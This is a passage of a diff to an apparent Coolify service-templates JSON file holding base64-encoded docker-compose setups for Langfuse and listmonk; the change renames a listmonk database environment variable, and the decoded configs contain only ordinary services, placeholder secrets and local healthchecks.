BTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWX0nCiAgICAgIDE2OiAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0VORFBPSU5UPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0VORFBPSU5UfScKICAgICAgMTc6ICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAgICAgMTg6ICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUFJFRklYPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1BSRUZJWDotZXZlbnRzL30nCiAgICAgIDE5OiAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0JVQ0tFVD0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9CVUNLRVQ6LWxhbmdmdXNlfScKICAgICAgMjA6ICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUkVHSU9OPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1JFR0lPTjotYXV0b30nCiAgICAgIDIxOiAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0FDQ0VTU19LRVlfSUQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQUNDRVNTX0tFWV9JRH0nCiAgICAgIDIyOiAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1NFQ1JFVF9BQ0NFU1NfS0VZPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1NFQ1JFVF9BQ0NFU1NfS0VZfScKICAgICAgMjM6ICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRU5EUE9JTlR9JwogICAgICAyNDogJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU6LXRydWV9JwogICAgICAyNTogJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9QUkVGSVg9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUFJFRklYOi1tZWRpYS99JwogICAgICAyNjogJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkFCTEVEPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VOQUJMRUQ6LWZhbHNlfScKICAgICAgMjc6ICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0JVQ0tFVDotbGFuZ2Z1c2V9JwogICAgICAyODogJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9QUkVGSVg9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUFJFRklYOi1leHBvcnRzL30nCiAgICAgIDI5OiAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1JFR0lPTj0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9SRUdJT046LWF1dG99JwogICAgICAzMDogJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkRQT0lOVH0nCiAgICAgIDMxOiAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VYVEVSTkFMX0VORFBPSU5UPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VYVEVSTkFMX0VORFBPSU5UfScKICAgICAgMzI6ICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQUNDRVNTX0tFWV9JRD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9BQ0NFU1NfS0VZX0lEfScKICAgICAgMzM6ICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfU0VDUkVUX0FDQ0VTU19LRVl9JwogICAgICAzNDogJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9GT1JDRV9QQVRIX1NUWUxFPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0ZPUkNFX1BBVEhfU1RZTEU6LXRydWV9JwogICAgICAzNTogJ0xBTkdGVVNFX0lOR0VTVElPTl9RVUVVRV9ERUxBWV9NUz0ke0xBTkdGVVNFX0lOR0VTVElPTl9RVUVVRV9ERUxBWV9NUzotMX0nCiAgICAgIDM2OiAnTEFOR0ZVU0VfSU5HRVNUSU9OX0NMSUNLSE9VU0VfV1JJVEVfSU5URVJWQUxfTVM9JHtMQU5HRlVTRV9JTkdFU1RJT05fQ0xJQ0tIT1VTRV9XUklURV9JTlRFUlZBTF9NUzotMTAwMH0nCiAgICAgIDM3OiBSRURJU19IT1NUPXJlZGlzCiAgICAgIDM4OiBSRURJU19QT1JUPTYzNzkKICAgICAgMzk6ICdSRURJU19BVVRIPSR7U0VSVklDRV9QQVNTV09SRF9SRURJU30nCiAgICAgIDQwOiAnRU1BSUxfRlJPTV9BRERSRVNTPSR7RU1BSUxfRlJPTV9BRERSRVNTOi1hZG1pbkBleGFtcGxlLmNvbX0nCiAgICAgIDQxOiAnU01UUF9DT05ORUNUSU9OX1VSTD0ke1NNVFBfQ09OTkVDVElPTl9VUkw6LX0nCiAgICAgIDQyOiAnTkVYVEFVVEhfU0VDUkVUPSR7U0VSVklDRV9CQVNFNjRfTkVYVEFVVEhTRUNSRVR9JwogICAgICA0MzogJ0FVVEhfRElTQUJMRV9TSUdOVVA9JHtBVVRIX0RJU0FCTEVfU0lHTlVQOi10cnVlfScKICAgICAgNDQ6ICdIT1NUTkFNRT0ke0hPU1ROQU1FOi0wLjAuMC4wfScKICAgICAgNDU6ICdMQU5HRlVTRV9JTklUX09SR19JRD0ke0xBTkdGVVNFX0lOSVRfT1JHX0lEOi1teS1vcmd9JwogICAgICA0NjogJ0xBTkdGVVNFX0lOSVRfT1JHX05BTUU9JHtMQU5HRlVTRV9JTklUX09SR19OQU1FOi1NeSBPcmd9JwogICAgICA0NzogJ0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9JRD0ke0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9JRDotbXktcHJvamVjdH0nCiAgICAgIDQ4OiAnTEFOR0ZVU0VfSU5JVF9QUk9KRUNUX05BTUU9JHtMQU5HRlVTRV9JTklUX1BST0pFQ1RfTkFNRTotTXkgUHJvamVjdH0nCiAgICAgIDQ5OiAnTEFOR0ZVU0VfSU5JVF9VU0VSX0VNQUlMPSR7TEFOR0ZVU0VfSU5JVF9VU0VSX0VNQUlMOi1hZG1pbkBleGFtcGxlLmNvbX0nCiAgICAgIDUwOiAnTEFOR0ZVU0VfSU5JVF9VU0VSX05BTUU9JHtTRVJWSUNFX1VTRVJfTEFOR0ZVU0V9JwogICAgICA1MTogJ0xBTkdGVVNFX0lOSVRfVVNFUl9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfTEFOR0ZVU0V9JwogICAgICBTRVJWSUNFX0ZRRE5fTEFOR0ZVU0VfMzAwMDogJyR7U0VSVklDRV9GUUROX0xBTkdGVVNFXzMwMDB9JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIHdnZXQKICAgICAgICAtICctcScKICAgICAgICAtICctLXNwaWRlcicKICAgICAgICAtICdodHRwOi8vMTI3LjAuMC4xOjMwMDAvYXBpL3B1YmxpYy9oZWFsdGgnCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAzCiAgbGFuZ2Z1c2Utd29ya2VyOgogICAgaW1hZ2U6ICdsYW5nZnVzZS9sYW5nZnVzZS13b3JrZXI6MycKICAgIGVudmlyb25tZW50OgogICAgICAtICdORVhUQVVUSF9VUkw9JHtTRVJWSUNFX0ZRRE5fTEFOR0ZVU0V9JwogICAgICAtICdEQVRBQkFTRV9VUkw9cG9zdGdyZXNxbDovLyR7U0VSVklDRV9VU0VSX1BPU1RHUkVTfToke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9QHBvc3RncmVzOjU0MzIvJHtQT1NUR1JFU19EQjotbGFuZ2Z1c2UtZGJ9JwogICAgICAtICdTQUxUPSR7U0VSVklDRV9QQVNTV09SRF9TQUxUfScKICAgICAgLSAnRU5DUllQVElPTl9LRVk9JHtTRVJWSUNFX1BBU1NXT1JEXzY0X0xBTkdGVVNFfScKICAgICAgLSAnVEVMRU1FVFJZX0VOQUJMRUQ9JHtURUxFTUVUUllfRU5BQkxFRDotZmFsc2V9JwogICAgICAtICdMQU5HRlVTRV9FTkFCTEVfRVhQRVJJTUVOVEFMX0ZFQVRVUkVTPSR7TEFOR0ZVU0VfRU5BQkxFX0VYUEVSSU1FTlRBTF9GRUFUVVJFUzotZmFsc2V9JwogICAgICAtICdDTElDS0hPVVNFX01JR1JBVElPTl9VUkw9Y2xpY2tob3VzZTovL2NsaWNraG91c2U6OTAwMCcKICAgICAgLSAnQ0xJQ0tIT1VTRV9VUkw9aHR0cDovL2NsaWNraG91c2U6ODEyMycKICAgICAgLSAnQ0xJQ0tIT1VTRV9VU0VSPSR7U0VSVklDRV9VU0VSX0NMSUNLSE9VU0V9JwogICAgICAtICdDTElDS0hPVVNFX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9DTElDS0hPVVNFfScKICAgICAgLSBDTElDS0hPVVNFX0NMVVNURVJfRU5BQkxFRD1mYWxzZQogICAgICAtICdMQU5HRlVTRV9VU0VfQVpVUkVfQkxPQj0ke0xBTkdGVVNFX1VTRV9BWlVSRV9CTE9COi1mYWxzZX0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9CVUNLRVQ9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQlVDS0VUOi1sYW5nZnVzZX0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9SRUdJT049JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUkVHSU9OOi1hdXRvfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0FDQ0VTU19LRVlfSUQ9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQUNDRVNTX0tFWV9JRH0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWT0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWX0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9FTkRQT0lOVH0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU6LXRydWV9JwogICAgICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUFJFRklYPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1BSRUZJWDotZXZlbnRzL30nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9CVUNLRVQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQlVDS0VUOi1sYW5nZnVzZX0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9SRUdJT049JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUkVHSU9OOi1hdXRvfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0FDQ0VTU19LRVlfSUQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQUNDRVNTX0tFWV9JRH0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWT0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWX0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9FTkRQT0lOVH0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU6LXRydWV9JwogICAgICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUFJFRklYPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1BSRUZJWDotbWVkaWEvfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VOQUJMRUQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5BQkxFRDotZmFsc2V9JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0JVQ0tFVDotbGFuZ2Z1c2V9JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUFJFRklYPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1BSRUZJWDotZXhwb3J0cy99JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUkVHSU9OPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1JFR0lPTjotYXV0b30nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkRQT0lOVH0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FWFRFUk5BTF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FWFRFUk5BTF9FTkRQT0lOVH0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9BQ0NFU1NfS0VZX0lEPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0FDQ0VTU19LRVlfSUR9JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfU0VDUkVUX0FDQ0VTU19LRVl9JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAgICAgLSAnTEFOR0ZVU0VfSU5HRVNUSU9OX1FVRVVFX0RFTEFZX01TPSR7TEFOR0ZVU0VfSU5HRVNUSU9OX1FVRVVFX0RFTEFZX01TOi0xfScKICAgICAgLSAnTEFOR0ZVU0VfSU5HRVNUSU9OX0NMSUNLSE9VU0VfV1JJVEVfSU5URVJWQUxfTVM9JHtMQU5HRlVTRV9JTkdFU1RJT05fQ0xJQ0tIT1VTRV9XUklURV9JTlRFUlZBTF9NUzotMTAwMH0nCiAgICAgIC0gUkVESVNfSE9TVD1yZWRpcwogICAgICAtIFJFRElTX1BPUlQ9NjM3OQogICAgICAtICdSRURJU19BVVRIPSR7U0VSVklDRV9QQVNTV09SRF9SRURJU30nCiAgICAgIC0gJ0VNQUlMX0ZST01fQUREUkVTUz0ke0VNQUlMX0ZST01fQUREUkVTUzotYWRtaW5AZXhhbXBsZS5jb219JwogICAgICAtICdTTVRQX0NPTk5FQ1RJT05fVVJMPSR7U01UUF9DT05ORUNUSU9OX1VSTDotfScKICAgICAgLSAnTkVYVEFVVEhfU0VDUkVUPSR7U0VSVklDRV9CQVNFNjRfTkVYVEFVVEhTRUNSRVR9JwogICAgICAtICdBVVRIX0RJU0FCTEVfU0lHTlVQPSR7QVVUSF9ESVNBQkxFX1NJR05VUDotdHJ1ZX0nCiAgICAgIC0gJ0hPU1ROQU1FPSR7SE9TVE5BTUU6LTAuMC4wLjB9JwogICAgICAtICdMQU5HRlVTRV9JTklUX09SR19JRD0ke0xBTkdGVVNFX0lOSVRfT1JHX0lEOi1teS1vcmd9JwogICAgICAtICdMQU5HRlVTRV9JTklUX09SR19OQU1FPSR7TEFOR0ZVU0VfSU5JVF9PUkdfTkFNRTotTXkgT3JnfScKICAgICAgLSAnTEFOR0ZVU0VfSU5JVF9QUk9KRUNUX0lEPSR7TEFOR0ZVU0VfSU5JVF9QUk9KRUNUX0lEOi1teS1wcm9qZWN0fScKICAgICAgLSAnTEFOR0ZVU0VfSU5JVF9QUk9KRUNUX05BTUU9JHtMQU5HRlVTRV9JTklUX1BST0pFQ1RfTkFNRTotTXkgUHJvamVjdH0nCiAgICAgIC0gJ0xBTkdGVVNFX0lOSVRfVVNFUl9FTUFJTD0ke0xBTkdGVVNFX0lOSVRfVVNFUl9FTUFJTDotYWRtaW5AZXhhbXBsZS5jb219JwogICAgICAtICdMQU5HRlVTRV9JTklUX1VTRVJfTkFNRT0ke1NFUlZJQ0VfVVNFUl9MQU5HRlVTRX0nCiAgICAgIC0gJ0xBTkdGVVNFX0lOSVRfVVNFUl9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfTEFOR0ZVU0V9JwogICAgZGVwZW5kc19vbjoKICAgICAgcG9zdGdyZXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcmVkaXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgY2xpY2tob3VzZToKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogIHBvc3RncmVzOgogICAgaW1hZ2U6ICdwb3N0Z3JlczoxNy1hbHBpbmUnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotbGFuZ2Z1c2UtZGJ9JwogICAgICAtICdQT1NUR1JFU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19VU0VSPSR7U0VSVklDRV9VU0VSX1BPU1RHUkVTfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2xhbmdmdXNlX3Bvc3RncmVzX2RhdGE6L3Zhci9saWIvcG9zdGdyZXNxbC9kYXRhJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1oIGxvY2FsaG9zdCAtVSAkJHtQT1NUR1JFU19VU0VSfSAtZCAkJHtQT1NUR1JFU19EQn0nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAogIHJlZGlzOgogICAgaW1hZ2U6ICdyZWRpczo4JwogICAgY29tbWFuZDoKICAgICAgLSBzaAogICAgICAtICctYycKICAgICAgLSAncmVkaXMtc2VydmVyIC0tcmVxdWlyZXBhc3MgIiRTRVJWSUNFX1BBU1NXT1JEX1JFRElTIicKICAgIGVudmlyb25tZW50OgogICAgICAtICdSRURJU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUkVESVN9JwogICAgdm9sdW1lczoKICAgICAgLSAnbGFuZ2Z1c2VfcmVkaXNfZGF0YTovZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSByZWRpcy1jbGkKICAgICAgICAtICctYScKICAgICAgICAtICRTRVJWSUNFX1BBU1NXT1JEX1JFRElTCiAgICAgICAgLSBQSU5HCiAgICAgIGludGVydmFsOiAzcwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMTAKICBjbGlja2hvdXNlOgogICAgaW1hZ2U6ICdjbGlja2hvdXNlL2NsaWNraG91c2Utc2VydmVyOjI2LjIuNC4yMycKICAgIHVzZXI6ICcxMDE6MTAxJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ0NMSUNLSE9VU0VfREI9JHtDTElDS0hPVVNFX0RCOi1kZWZhdWx0fScKICAgICAgLSAnQ0xJQ0tIT1VTRV9VU0VSPSR7U0VSVklDRV9VU0VSX0NMSUNLSE9VU0V9JwogICAgICAtICdDTElDS0hPVVNFX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9DTElDS0hPVVNFfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2xhbmdmdXNlX2NsaWNraG91c2VfZGF0YTovdmFyL2xpYi9jbGlja2hvdXNlJwogICAgICAtICdsYW5nZnVzZV9jbGlja2hvdXNlX2xvZ3M6L3Zhci9sb2cvY2xpY2tob3VzZS1zZXJ2ZXInCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDogJ3dnZXQgLS1uby12ZXJib3NlIC0tdHJpZXM9MSAtLXNwaWRlciBodHRwOi8vbG9jYWxob3N0OjgxMjMvcGluZyB8fCBleGl0IDEnCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAo=",
         "tags": [
             "ai",
             "qdrant",
@@ -2502,7 +2518,7 @@
     "listmonk": {
         "documentation": "https://listmonk.app/?utm_source=coolify.io",
         "slogan": "Self-hosted newsletter and mailing list manager",
-        "compose": "c2VydmljZXM6CiAgbGlzdG1vbms6CiAgICBpbWFnZTogJ2xpc3Rtb25rL2xpc3Rtb25rOnY2LjAuMCcKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfRlFETl9MSVNUTU9OS185MDAwCiAgICAgIC0gJ0xJU1RNT05LX2FwcF9fYWRkcmVzcz0wLjAuMC4wOjkwMDAnCiAgICAgIC0gTElTVE1PTktfZGJfX2hvc3Q9cG9zdGdyZXMKICAgICAgLSBMSVNUTU9OS19kYl9fbmFtZT1saXN0bW9uawogICAgICAtIExJU1RNT05LX2RiX191c2VyPSRTRVJWSUNFX1VTRVJfUE9TVEdSRVMKICAgICAgLSBMSVNUTU9OS19kYl9fcGFzc3dvcmQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgLSBMSVNUTU9OS19kYl9fcG9ydD01NDMyCiAgICAgIC0gVFo9RXRjL1VUQwogICAgdm9sdW1lczoKICAgICAgLSAnbGlzdG1vbmstZGF0YTovbGlzdG1vbmsvdXBsb2FkcycKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSB3Z2V0CiAgICAgICAgLSAnLXEnCiAgICAgICAgLSAnLS1zcGlkZXInCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTo5MDAwJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCiAgICBkZXBlbmRzX29uOgogICAgICBwb3N0Z3JlczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogIGxpc3Rtb25rLWluaXRpYWwtZGF0YWJhc2Utc2V0dXA6CiAgICBpbWFnZTogJ2xpc3Rtb25rL2xpc3Rtb25rOnY2LjAuMCcKICAgIGNvbW1hbmQ6ICcuL2xpc3Rtb25rIC0taW5zdGFsbCAtLXllcyAtLWlkZW1wb3RlbnQnCiAgICByZXN0YXJ0OiAnbm8nCiAgICBkZXBlbmRzX29uOgogICAgICBwb3N0Z3JlczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gTElTVE1PTktfZGJfX2hvc3Q9cG9zdGdyZXMKICAgICAgLSBMSVNUTU9OS19kYl9fbmFtZT1saXN0bW9uawogICAgICAtIExJU1RNT05LX2RiX191c2VyPSRTRVJWSUNFX1VTRVJfUE9TVEdSRVMKICAgICAgLSBMSVNUTU9OS19kYl9fcGFzc3dvcmQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgLSBMSVNUTU9OS19kYl9fcG9ydD01NDMyCiAgcG9zdGdyZXM6CiAgICBpbWFnZTogJ3Bvc3RncmVzOjE4LWFscGluZScKICAgIGVudmlyb25tZW50OgogICAgICAtIFBPU1RHUkVTX0RCPWxpc3Rtb25rCiAgICAgIC0gUE9TVEdSRVNfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgLSBQT1NUR1JFU19VU0VSPSRTRVJWSUNFX1VTRVJfUE9TVEdSRVMKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3Bvc3RncmVzLWRhdGE6L3Zhci9saWIvcG9zdGdyZXNxbCcKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncGdfaXNyZWFkeSAtVSAkJHtQT1NUR1JFU19VU0VSfSAtZCAkJHtQT1NUR1JFU19EQn0nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAK",
+        "compose": "c2VydmljZXM6CiAgbGlzdG1vbms6CiAgICBpbWFnZTogJ2xpc3Rtb25rL2xpc3Rtb25rOnY2LjAuMCcKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfRlFETl9MSVNUTU9OS185MDAwCiAgICAgIC0gJ0xJU1RNT05LX2FwcF9fYWRkcmVzcz0wLjAuMC4wOjkwMDAnCiAgICAgIC0gTElTVE1PTktfZGJfX2hvc3Q9cG9zdGdyZXMKICAgICAgLSBMSVNUTU9OS19kYl9fZGF0YWJhc2U9bGlzdG1vbmsKICAgICAgLSBMSVNUTU9OS19kYl9fdXNlcj0kU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIC0gTElTVE1PTktfZGJfX3Bhc3N3b3JkPSRTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTCiAgICAgIC0gTElTVE1PTktfZGJfX3BvcnQ9NTQzMgogICAgICAtIFRaPUV0Yy9VVEMKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2xpc3Rtb25rLWRhdGE6L2xpc3Rtb25rL3VwbG9hZHMnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gd2dldAogICAgICAgIC0gJy1xJwogICAgICAgIC0gJy0tc3BpZGVyJwogICAgICAgIC0gJ2h0dHA6Ly8xMjcuMC4wLjE6OTAwMCcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogICAgZGVwZW5kc19vbjoKICAgICAgcG9zdGdyZXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICBsaXN0bW9uay1pbml0aWFsLWRhdGFiYXNlLXNldHVwOgogICAgaW1hZ2U6ICdsaXN0bW9uay9saXN0bW9uazp2Ni4wLjAnCiAgICBjb21tYW5kOiAnLi9saXN0bW9uayAtLWluc3RhbGwgLS15ZXMgLS1pZGVtcG90ZW50JwogICAgcmVzdGFydDogJ25vJwogICAgZGVwZW5kc19vbjoKICAgICAgcG9zdGdyZXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGVudmlyb25tZW50OgogICAgICAtIExJU1RNT05LX2RiX19ob3N0PXBvc3RncmVzCiAgICAgIC0gTElTVE1PTktfZGJfX2RhdGFiYXNlPWxpc3Rtb25rCiAgICAgIC0gTElTVE1PTktfZGJfX3VzZXI9JFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgICAtIExJU1RNT05LX2RiX19wYXNzd29yZD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtIExJU1RNT05LX2RiX19wb3J0PTU0MzIKICBwb3N0Z3JlczoKICAgIGltYWdlOiAncG9zdGdyZXM6MTgtYWxwaW5lJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gUE9TVEdSRVNfREI9bGlzdG1vbmsKICAgICAgLSBQT1NUR1JFU19QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtIFBPU1RHUkVTX1VTRVI9JFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgdm9sdW1lczoKICAgICAgLSAncG9zdGdyZXMtZGF0YTovdmFyL2xpYi9wb3N0Z3Jlc3FsJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1VICQke1BPU1RHUkVTX1VTRVJ9IC1kICQke1BPU1RHUkVTX0RCfScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdX